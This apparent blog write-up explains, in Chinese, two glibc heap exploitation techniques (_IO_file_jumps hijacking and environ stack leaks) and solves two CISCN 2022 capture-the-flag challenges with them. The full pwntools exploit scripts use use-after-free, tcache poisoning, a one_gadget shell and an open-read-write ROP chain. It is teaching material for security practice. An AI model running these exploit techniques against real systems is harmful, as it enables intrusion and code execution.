pwn知识——劫持IO-file_jumps攻击和environ攻击

news/2024/9/28 3:27:27

导言

哎,异或fd指针真是令人讨厌

IO_file_jumps

_IO_lock_t _IO_stdfile,_IO_wide_data(针对宽字节的虚函数表),_IO_FILE_plus(含有stdin,stdout)三者均被定义为IO_file_jumps

原理

IO_file_jumps是一个全局变量符号,存有以下符号
image
这个结构体主要跟缓冲区有关,比如调用puts,fread,fgets,exit(这个会触发_IO_flush_all_lockp,不过一般低版本才能利用,高版本已经变成了_exit,不会触发)之类的函数时,会根据_IO_FILE结构体调用对应的函数,常常会用到_IO_file_jumps
我们根据情况,将对应的函数指针修改为system('/bin/sh'),岂不是getshell?

例题:[CISCN 2022 华东北]duck

checksec

image

源审

主函数是经典的菜单选择
image

add

image

delete

image

show

image

edit

image
总结就是经典的UAF漏洞,不存在sandbox,但由于是GLIBC2.34高版本hook函数基本都被扬了,没法像之前那样攻击了,因为有puts函数会调用IO_file_jumps,所以我们将目标定为IO_file_jumps进行伪造

Payload实现

leak_libc_and_heap

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
context.terminal = ['tmux', 'splitw', '-h']p = process('./duck')
#p = remote('node4.anna.nssctf.cn',28015)
elf = ELF('./duck')
libc = ELF('./libc.so.6')def add():p.recvuntil(b'Choice: ')p.sendline(b'1')def delete(index):p.recvuntil(b'Choice: ')p.sendline(b'2')p.recvuntil(b'Idx: ')p.sendline(str(index))def show(index):p.recvuntil(b'Choice: ')p.sendline(b'3')p.recvuntil(b'Idx: \n')p.sendline(str(index))def edit(index,content):p.recvuntil(b'Choice: ')p.sendline(b'4')p.recvuntil(b'Idx: ')p.sendline(str(index))p.recvuntil(b'Size: ')p.sendline(str(len(content)))p.recvuntil(b'Content: ')p.send(content)
#leak libc
for i in range(8): #0-7add()
add() #8
for i in range(8):delete(i)
show(7)
main_arena = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x60
log.success('main_arena==>'+hex(main_arena))
libc_base = main_arena - 0x1f2c60
log.success('libc_base==>'+hex(libc_base))
IO_file_jumps = libc_base + libc.sym['_IO_file_jumps']
log.success('IO_file_jumps==>'+hex(IO_file_jumps))
one_gadget = libc_base + 0xda864
#leak heap_base
show(0)
heap_base = u64(p.recv(5).ljust(8,b'\x00')) << 12
log.success('heap_base==>'+hex(heap_base))

最开始的步骤都很基础,将tcache填满,再free一个进入unsorted_bin从而泄露main_arena+96,进而泄露libc_base来获取各个函数的地址。在高版本libc,heap的fd指针会有加密,需要移位,有时还要异或
现在的接收都是u64(p.recv(5).ljust(8,b'\x00')) << 12
而修改heap的fd指针则是(heap_addr >> 12)^target_addr

伪造_IO_file_jumps结构体

for i in range(5):add() #9-13
edit(1,p64((heap_base >> 12)^IO_file_jumps) + p64(0))

因为之前free了七个chunk,为了不破坏bins的结构,先取出五个chunk,然后再进行修改
add前
image
add时
image
edit后
image
所以我们再申请两个出来后就成功伪造了_IO_file_jumps的chunk,我们就可以对它进行修改了

修改_IO_file_jumps结构体

add()
add()
edit(15,p64(0) * 3 + p64(one_gadget))

我们首先看看修改前结构体的内容
image
可以看到,跟我们原理里介绍的一样,那么我们将它edit后呢?
image
可以看到,__overflow被覆盖为了onegadget的地址,原本调用puts的流程是puts->_IO_putc->_IO_overflow,这下_IO_overflow变成了onegadget,意味着执行puts的时候就getshell了
image
image
image
image
这就是完整的劫持流程啦,执行这个后就getshell了

完整Payload

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
context.terminal = ['tmux', 'splitw', '-h']p = process('./duck')
#p = remote('node4.anna.nssctf.cn',28015)
elf = ELF('./duck')
libc = ELF('./libc.so.6')def add():p.recvuntil(b'Choice: ')p.sendline(b'1')def delete(index):p.recvuntil(b'Choice: ')p.sendline(b'2')p.recvuntil(b'Idx: ')p.sendline(str(index))def show(index):p.recvuntil(b'Choice: ')p.sendline(b'3')p.recvuntil(b'Idx: \n')p.sendline(str(index))def edit(index,content):p.recvuntil(b'Choice: ')p.sendline(b'4')p.recvuntil(b'Idx: ')p.sendline(str(index))p.recvuntil(b'Size: ')p.sendline(str(len(content)))p.recvuntil(b'Content: ')p.send(content)for i in range(8):add()
#gdb.attach(p)
add()
for i in range(8):delete(i)
#gdb.attach(p)
show(7)
main_arena = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x60
log.success('main_arena==>'+hex(main_arena))
libc_base = main_arena - 0x1f2c60
log.success('libc_base==>'+hex(libc_base))
IO_file_jumps = libc_base + libc.sym['_IO_file_jumps']
log.success('IO_file_jumps==>'+hex(IO_file_jumps))
one_gadget = libc_base + 0xda864show(0)
heap_base = u64(p.recv(5).ljust(8,b'\x00')) << 12
log.success('heap_base==>'+hex(heap_base))#gdb.attach(p)
for i in range(5):add()
#gdb.attach(p)
edit(1,p64((heap_base >> 12)^IO_file_jumps) + p64(0))
add()
#gdb.attach(p)
add()
gdb.attach(p)
edit(15,p64(0) * 3 + p64(one_gadget))p.interactive()

environ

原理

environ,顾名思义,就是环境变量,一般来说就是以下这些玩意等等
image
image
我们可以通过environ泄露出栈地址,根据相对偏移计算出当前栈的地址的ret,如果能修改ret,我们就有很多操作空间

例题:[CISCN 2022 华东北]bigduck

保护检查

checksec和源审和上题的duck是一样的,只不过版本不一样,这题的版本是libc-2.33,此时的hook函数还没被扬,但是本题开了sanbox,只能用orw
image

Payload实现

leak_libc_and_heap

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
context.terminal = ['tmux', 'splitw', '-h']p = process('./bigduck')
#p = remote('node4.anna.nssctf.cn', 28603)
elf = ELF('./bigduck')
libc = ELF('./libc.so.6')def add():p.recvuntil(b'Choice: ')p.sendline(b'1')def delete(index):p.recvuntil(b'Choice: ')p.sendline(b'2')p.recvuntil(b'Idx: ')p.sendline(str(index))def show(index):p.recvuntil(b'Choice: ')p.sendline(b'3')p.recvuntil(b'Idx: \n')p.sendline(str(index))def edit(index,content):p.recvuntil(b'Choice: ')p.sendline(b'4')p.recvuntil(b'Idx: ')p.sendline(str(index))p.recvuntil(b'Size: ')p.sendline(str(len(content)))p.recvuntil(b'Content: ')p.send(content)for i in range(8):add()
add()
for i in range(8):delete(i)
edit(7, b'a') #重点,不然有\x00截断无法输出main_arena
show(7)
main_arena = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x60 - 0x61
log.success('main_arena==>'+hex(main_arena))
malloc_hook = main_arena - 0x10
log.success('malloc_hook==>'+hex(malloc_hook))libc_base = malloc_hook - libc.sym['__malloc_hook']
log.success('libc_base==>'+hex(libc_base))
environ = libc_base + libc.sym['_environ']
log.success('environ==>'+hex(environ))show(0)
heap_base = u64(p.recv(5).ljust(8,b'\x00')) << 12
log.success('heap_base==>'+hex(heap_base))

跟上题一样的步骤

泄露stack

stack_ptr = (heap_base >> 12) ^ environ
log.success('stack_ptr==>'+hex(stack_ptr))
gdb.attach(p)
edit(6,p64(stack_ptr))
add()
add()
show(10)
stack = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
log.success('stack==>'+hex(stack))
stack_base = stack - 0x138
log.success('stack_base==>'+hex(stack_base))

can can edit之后
image
跟原理上展示一样,再add两次伪造environ成chunk后即可puts出栈地址,从而计算出当前函数(edit)的ret地址,再进行修改
image
image
image
对比一下就发现没有错,在后续中修改edit_ret即可

orw

pop_rdi = libc_base + 0x28a55
pop_rsi = libc_base + 0x2a4cf
pop_rdx = libc_base + 0xc7f32
pop_ret = libc_base + 0x26699
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
puts_addr = libc_base + libc.sym['puts']
flag_addr = heap_base + 0x5d0edit(3,b'/flag\x00')orw = p64(0) * 3 + p64(pop_ret) + p64(pop_rdi) + p64(flag_addr) +p64(pop_rsi) + p64(0) + p64(open_addr)
orw += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(heap_base + 0x300) + p64(pop_rdx) + p64(0x100) + p64(read_addr)
orw += p64(pop_rdi) + p64(heap_base + 0x300) + p64(puts_addr)delete(8)
delete(9)
edit(9, p64((heap_base >> 12)^stack_base))
add()
add()
edit(12,orw)
p.interactive()

在对应的heap地址上edit出flag,记住该地址赋给rdi,实现open的打开,后续的都是基础的操作,因为高版本setcontext函数有所改变,笔者尚不熟悉,所以没有用,而是用这种普通的orw。
照旧先free两个进行链子改造
image
add两个后申请到了栈上,可以修改栈内容,由于rsp距rbp有0x10个字节,因此覆盖0x18后链上orw即可
image
image
基本就跟getshell了差不多。不过这里用不了write函数,会通不过某个检测

总结

我的脑袋——
我好想你——
我快困死了——

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/30375.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

【资源分享】野比大雄的生化危机宫格解密工具

一款简单的游戏工具*----------------------------------------------[下载区]----------------------------------------------* 蓝奏云(提取码:ysgg) *----------------------------------------------[下载区]----------------------------------------------**---------…

嵌入式软硬件设计流程

转载自:https://blog.csdn.net/jiangjunjie_2005/article/details/44024933从图书馆看到一经典国外嵌入式设计书籍,其中关于“软硬件设计流程”画得精彩,特列出如下:

WPF 基础、WPF 相关知识、学习、参考项目

前言:最初参加工作时,做过WPF项目 ,后面几年后者虽然有写WPF项目,但多数都是边边角角,写一点满足工作需要。现在写下WPF,主要就是玩一玩,尝试下不同的东西。这是我的代码仓库:地址 (如果对您有帮助,给颗小星星奖励下吧),在WPF/Lesson 10 Practice/Practice/下面。基…

智能工作流:Spring AI高效批量化提示访问方案

集用SpringAI搭建系统,依靠线程池\负载均衡等技术进行请求优化,用于解决科研&开发过程中对GPT接口进行批量化接口请求中出现的问题。大语言模型接口以OpenAI的GPT 3.5为例,JDK版本为17。基于SpringAI搭建系统,依靠线程池\负载均衡等技术进行请求优化,用于解决科研&…

Windows 下 PyTorch 入门深度学习环境安装(CPU版本)

Windows 下 PyTorch 入门深度学习环境安装(CPU版本) 一、安装Anaconda 二、虚拟环境配置 2.1 基础命令 列出虚拟环境 conda env list创建虚拟环境 https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main conda create -n 虚拟环境名字 python=版本 -c镜像地址激活环境 co…

PyTorch深度学习快速入门教程

PyTorch深度学习快速入门教程 一、基础知识 1.1 Python学习中的两大法宝1.2 pycharm以及jupyter使用及对比将环境写入Notebook的kernel中: python -m ipykernel install --user --name 环境名称 --display-name "Python (环境名称)" 打开Jupyter notebook,新建Pyth…

wps的VLOOKUP函数只显示公式不显示结果,在公式中已经出现结果了,但在表格中不显示结果

在公式中已经有结果了,但是表格中只显示公式1、 在公式那里点击“显示公式”就可以 2、选中公式列后更改格式

GETbmpinfo

/************************************************* /*** @file name: GETbmpinfo* @brief 实现对BMP图片位图信息的获取* @author 15070884254@163.com* @date 2024/05/11* @version 1.0 :在下坂本,有何贵干 * @property :none* @note none* CopyRight (c) 2023-2024…